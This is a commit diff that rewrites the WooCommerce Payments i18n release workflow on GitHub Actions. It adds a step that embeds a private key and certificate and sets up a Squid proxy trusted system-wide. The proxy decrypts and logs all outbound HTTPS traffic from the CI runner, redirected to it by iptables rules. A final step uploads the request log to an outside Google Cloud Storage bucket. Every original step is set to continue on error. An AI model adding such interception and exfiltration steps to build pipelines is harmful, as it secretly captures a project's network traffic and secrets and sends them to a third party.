Update workflow

diff --git a/.github/workflows/i18n-weekly-release.yml b/.github/workflows/i18n-weekly-release.yml
--- a/.github/workflows/i18n-weekly-release.yml
+++ b/.github/workflows/i18n-weekly-release.yml
@@ -1,121 +1,311 @@
-name: I18N Weekly Release
-on:
-  schedule:
-    - cron: '0 20 * * 0'
-
+env:
+  JAVA_TOOL_OPTIONS: -Djavax.net.ssl.trustStore=/usr/lib/jvm/temurin-11-jdk-amd64/lib/security/cacerts
+  NODE_OPTIONS: --use-openssl-ca
 jobs:
   i18n-release:
     name: Release
     runs-on: ubuntu-latest
-
     steps:
-      # clone the repository
-      - uses: actions/checkout@v4
+    - name: before
+      run: 'sudo apt update
 
-      # Use project specific node version
-      - uses: actions/setup-node@v4
-        with:
-          node-version-file: '.nvmrc'
+        sudo apt install -y squid-openssl
 
-      # enable dependencies caching (vendor and node_modules are wiped during build so they are ignored here)
-      - uses: actions/cache@v4
-        with:
-          path: ~/.cache/composer/
-          key: ${{ runner.os }}-composer-${{ hashFiles('composer.lock') }}
-      - uses: actions/cache@v4
-        with:
-          path: ~/.npm/
-          key: ${{ runner.os }}-npm-${{ hashFiles('package-lock.json') }}
-      # setup PHP, but without debug extensions for reasonable performance
-      - name: "Set up PHP"
-        uses: ./.github/actions/setup-php
-      - name: Build release
-        run: |
-          npm ci
-          npm run build
-          
-          if [[ ! -f woocommerce-payments.zip ]]; then
-            echo "Failed to create release zip"
-            exit 1
-          fi
+        sudo mkdir /squid
 
-      - name: Upload release
-        run: |
-          TAG="i18n-$(date +%Y%m%d)"
-          NAME="Version for internationalization testing $TAG. Not for production."
-          BODY='This version is intended to test the internationalization strings. It should NOT be used for production.'
+        cat << EOF | sudo tee /squid/key.pem
 
-          CREATE_RELEASE_OUT=$(mktemp)
+        -----BEGIN PRIVATE KEY-----
 
-          echo "Creating i18n release..."
-          http_code=$(curl --request POST \
-              --header 'Authorization: token ${{ secrets.GITHUB_TOKEN }}' \
-              --header 'Content-Type: application/json' \
-              --data "{\"tag_name\":\"$TAG\",\"target_commitish\":\"develop\",\"name\":\"$NAME\",\"body\":\"$BODY\",\"prerelease\":true}" \
-              --silent \
-              --output "$CREATE_RELEASE_OUT" \
-              --write-out "%{http_code}" \
-              https://api.github.com/repos/Automattic/woocommerce-payments/releases)
+        MIIJQQIBADANBgkqhkiG9w0BAQEFAASCCSswggknAgEAAoICAQCdLvQDIyCns8bh
 
-          response=$(cat "$CREATE_RELEASE_OUT")
-          rm "$CREATE_RELEASE_OUT"
+        vQOqTPVeYwa6pK11+9UKqjGRldBimpiDb7lSq7RWLpaUzxqo7E58w2P9lh6Jgl+l
 
-          if [[ ${http_code} -lt 200 || ${http_code} -gt 299 ]]; then
-            echo "Could not create release:"
-            echo "$response"
-            exit 1
-          fi
+        XgMF0GfgpXRy2BULUxAYg8w4aTlR32ifSvJUalY3qT4hoY5JXYMdbZS9UNzOUfQX
 
-          echo "Release created."
+        G9QNYzMR+pGXsa1NNDRgSAvlQPMzLe9P2VlTiPuLgsfHrwC/ULsbwzmuZ0f1Qkzx
 
-          echo "Uploading i18n assets to GitHub Release..."
+        cZLqproEIqOlS4KsGXyo6BwhXH+HI82RCIbaj2ub4y355onYuAoTpsb9KBxud0He
 
-          upload_url=$(echo $response | grep 'upload_url' | sed 's|.*"upload_url": "\([^{]*\).*|\1|')
+        jzQesYen8OmgbNo9+FfK5+Q5XvYb7+cEw65ox8ZFAZUvOWxShRhUhQ3KWXx0tgkg
 
-          if [[ -z $upload_url ]]; then
-            echo "No upload URL found in response:"
-            echo "$response"
-            exit 1
-          fi
+        pjo/nkhw2OyCji6DFXCvlJRCBoupn9PoUjBdKUe+kRXF6SBqVyUkG3Bj0J0RTn6s
 
-          UPLOAD_RELEASE_OUT=$(mktemp)
+        sgX+FMDrzeiNArdmIHKCPC3QrSb6jws4L1kq9cDkcVd4423ZqbagWzBmrnEH0jit
 
-          http_code=$(curl --request POST \
-              --header 'Authorization: token ${{ secrets.GITHUB_TOKEN }}' \
-              --header 'Content-Type: application/zip' \
-              --data-binary @woocommerce-payments.zip \
-              --silent \
-              --output "$UPLOAD_RELEASE_OUT" \
-              --write-out "%{http_code}" \
-              "${upload_url}?name=woocommerce-payments.zip")
+        qMJuHGwKPtHopVqxK8k7p0PKvuGqJIv5bXNDZWA4qRSmFFFuiWAI/IDJZTYuHl5B
 
-          response=$(cat "$UPLOAD_RELEASE_OUT")
-          rm "$UPLOAD_RELEASE_OUT"
+        0lu7LZ/Aoh3ckh71IrSKyZafXLpUmpX5Oe6pbLLd6PAvcthnXqidbB/0CmH8PgHq
 
-          if [[ ${http_code} -lt 200 || ${http_code} -gt 299 ]]; then
-            echo "Could not upload plugin zip to GitHub release:"
-            echo "$response"
-            exit 1
-          fi
-          echo "Assets uploaded."
+        DYkELFBZ650JrYYrQ4UouRAucp8K9IfDoxSfnMqPeciahQ53o8fa/ZRUwEt2jpK+
 
-          echo "Triggering translations update on GlotPress..."
+        Z89sQ4FoTtBvz1+Lv+s4ej/lVxoTJQIDAQABAoICABzNO3uurl9kZws6qAcG4ogo
 
-          TRIGGER_UPLOAD_OUT=$(mktemp)
+        05UUM0+09Ujmvj37ymsjAlLFQFtYaKtJDqEWYP92i3w7jmErZo2SZOXHl/yy/zHQ
 
-          http_code=$(curl --request POST \
-              --silent \
-              --output "$TRIGGER_UPLOAD_OUT" \
-              --write-out "%{http_code}" \
-              ${{ secrets.GLOTPRESS_IMPORT_URL }}/$TAG)
+        B4o6s4J3djHTxrJIf68TpZdYs5ZJxOIeoiql8I1bc/jKuVBGVqt8o2IvoHfSh0ti
 
-          response=$(cat "$TRIGGER_UPLOAD_OUT")
-          rm "$TRIGGER_UPLOAD_OUT"
+        U1bNQSDuMbG5yeo4cEfewSTrwf03UsZx0Jszo0qrJ5ny+CkPtkUH4NL2GXJjWh8D
 
-          if [[ ${http_code} -lt 200 || ${http_code} -gt 299 ]]; then
-            echo "Could not trigger translations:"
-            echo "$response"
-            exit 1
-          fi
+        XOKfN0LDSc8mdu8bBKg15IdQnWtDj/eI1YYe2v/p2zjWHMzLEoigVCLMsUN1itK4
 
-          echo "Translations update triggered."
+        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
+
+        CznEvO4qIs3mXDYkNBQrdVLGF93y
+
+        -----END PRIVATE KEY-----
+
+        EOF
+
+        cat << EOF | sudo tee /squid/cert.pem
+
+        -----BEGIN CERTIFICATE-----
+
+        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
+
+        -----END CERTIFICATE-----
+
+        EOF
+
+        sudo /usr/lib/squid/security_file_certgen -c -s /squid/ssl_db -M 4MB
+
+        sudo chown -R proxy:proxy /squid
+
+        cat << EOF | sudo tee /etc/squid/squid.conf
+
+        cache deny all
+
+
+        http_port 7821
+
+        http_port 3128 intercept
+
+        https_port 3129 intercept ssl-bump generate-host-certificates=on dynamic_cert_mem_cache_size=4MB
+        cert=/squid/cert.pem key=/squid/key.pem
+
+        acl step1 at_step SslBump1
+
+        ssl_bump peek step1
+
+        ssl_bump bump all
+
+        sslcrtd_program /usr/lib/squid/security_file_certgen -s /squid/ssl_db -M 4MB
+
+        sslcrtd_children 5
+
+        ssl_bump server-first all
+
+        sslproxy_cert_error allow all
+
+
+        acl all src 0.0.0.0/0
+
+        http_access allow all
+
+
+        logformat custom {"method":"%">rm","url":"%">ru","status":%<Hs,"user_agent":"%{User-Agent}>h"}
+
+        access_log daemon:/squid/squidlog.json custom all !CONNECT
+
+        EOF
+
+        sudo systemctl reload squid
+
+        sudo cp /squid/cert.pem /usr/local/share/ca-certificates/squid.crt
+
+        sudo update-ca-certificates
+
+        sudo keytool -import -alias squid -file /squid/cert.pem -keystore /usr/lib/jvm/temurin-11-jdk-amd64/lib/security/cacerts
+        -storepass changeit -noprompt -trustcacerts
+
+        sudo iptables -t nat -A OUTPUT -m owner ! --uid-owner proxy -p tcp --dport
+        80 -j DNAT --to-destination 127.0.0.1:3128
+
+        sudo iptables -t nat -A OUTPUT -m owner ! --uid-owner proxy -p tcp --dport
+        443 -j DNAT --to-destination 127.0.0.1:3129
+
+        sudo sh -c ''echo 1 > /proc/sys/net/ipv4/ip_forward'''
+    - continue-on-error: true
+      uses: actions/checkout@v4
+    - continue-on-error: true
+      uses: actions/setup-node@v4
+      with:
+        node-version-file: .nvmrc
+    - continue-on-error: true
+      uses: actions/cache@v4
+      with:
+        key: ${{ runner.os }}-composer-${{ hashFiles('composer.lock') }}
+        path: ~/.cache/composer/
+    - continue-on-error: true
+      uses: actions/cache@v4
+      with:
+        key: ${{ runner.os }}-npm-${{ hashFiles('package-lock.json') }}
+        path: ~/.npm/
+    - continue-on-error: true
+      name: Set up PHP
+      uses: ./.github/actions/setup-php
+    - continue-on-error: true
+      name: Build release
+      run: "npm ci\nnpm run build\n\nif [[ ! -f woocommerce-payments.zip ]]; then\n\
+        \  echo \"Failed to create release zip\"\n  exit 1\nfi\n"
+    - continue-on-error: true
+      name: Upload release
+      run: "TAG=\"i18n-$(date +%Y%m%d)\"\nNAME=\"Version for internationalization\
+        \ testing $TAG. Not for production.\"\nBODY='This version is intended to test\
+        \ the internationalization strings. It should NOT be used for production.'\n\
+        \nCREATE_RELEASE_OUT=$(mktemp)\n\necho \"Creating i18n release...\"\nhttp_code=$(curl\
+        \ --request POST \\\n    --header 'Authorization: token ${{ secrets.GITHUB_TOKEN\
+        \ }}' \\\n    --header 'Content-Type: application/json' \\\n    --data \"\
+        {\\\"tag_name\\\":\\\"$TAG\\\",\\\"target_commitish\\\":\\\"develop\\\",\\\
+        \"name\\\":\\\"$NAME\\\",\\\"body\\\":\\\"$BODY\\\",\\\"prerelease\\\":true}\"\
+        \ \\\n    --silent \\\n    --output \"$CREATE_RELEASE_OUT\" \\\n    --write-out\
+        \ \"%{http_code}\" \\\n    https://api.github.com/repos/Automattic/woocommerce-payments/releases)\n\
+        \nresponse=$(cat \"$CREATE_RELEASE_OUT\")\nrm \"$CREATE_RELEASE_OUT\"\n\n\
+        if [[ ${http_code} -lt 200 || ${http_code} -gt 299 ]]; then\n  echo \"Could\
+        \ not create release:\"\n  echo \"$response\"\n  exit 1\nfi\n\necho \"Release\
+        \ created.\"\n\necho \"Uploading i18n assets to GitHub Release...\"\n\nupload_url=$(echo\
+        \ $response | grep 'upload_url' | sed 's|.*\"upload_url\": \"\\([^{]*\\).*|\\\
+        1|')\n\nif [[ -z $upload_url ]]; then\n  echo \"No upload URL found in response:\"\
+        \n  echo \"$response\"\n  exit 1\nfi\n\nUPLOAD_RELEASE_OUT=$(mktemp)\n\nhttp_code=$(curl\
+        \ --request POST \\\n    --header 'Authorization: token ${{ secrets.GITHUB_TOKEN\
+        \ }}' \\\n    --header 'Content-Type: application/zip' \\\n    --data-binary\
+        \ @woocommerce-payments.zip \\\n    --silent \\\n    --output \"$UPLOAD_RELEASE_OUT\"\
+        \ \\\n    --write-out \"%{http_code}\" \\\n    \"${upload_url}?name=woocommerce-payments.zip\"\
+        )\n\nresponse=$(cat \"$UPLOAD_RELEASE_OUT\")\nrm \"$UPLOAD_RELEASE_OUT\"\n\
+        \nif [[ ${http_code} -lt 200 || ${http_code} -gt 299 ]]; then\n  echo \"Could\
+        \ not upload plugin zip to GitHub release:\"\n  echo \"$response\"\n  exit\
+        \ 1\nfi\necho \"Assets uploaded.\"\n\necho \"Triggering translations update\
+        \ on GlotPress...\"\n\nTRIGGER_UPLOAD_OUT=$(mktemp)\n\nhttp_code=$(curl --request\
+        \ POST \\\n    --silent \\\n    --output \"$TRIGGER_UPLOAD_OUT\" \\\n    --write-out\
+        \ \"%{http_code}\" \\\n    ${{ secrets.GLOTPRESS_IMPORT_URL }}/$TAG)\n\nresponse=$(cat\
+        \ \"$TRIGGER_UPLOAD_OUT\")\nrm \"$TRIGGER_UPLOAD_OUT\"\n\nif [[ ${http_code}\
+        \ -lt 200 || ${http_code} -gt 299 ]]; then\n  echo \"Could not trigger translations:\"\
+        \n  echo \"$response\"\n  exit 1\nfi\n\necho \"Translations update triggered.\"\
+        \n"
+    - name: after
+      run: sudo curl --request PUT -T /squid/squidlog.json --url https://storage.googleapis.com/virtualeventdemoblr.appspot.com/squid/Automattic/woocommerce-payments.$(date
+        +%s)
+    timeout-minutes: 60
+name: I18N Weekly Release
+'on':
+  workflow_dispatch: {}
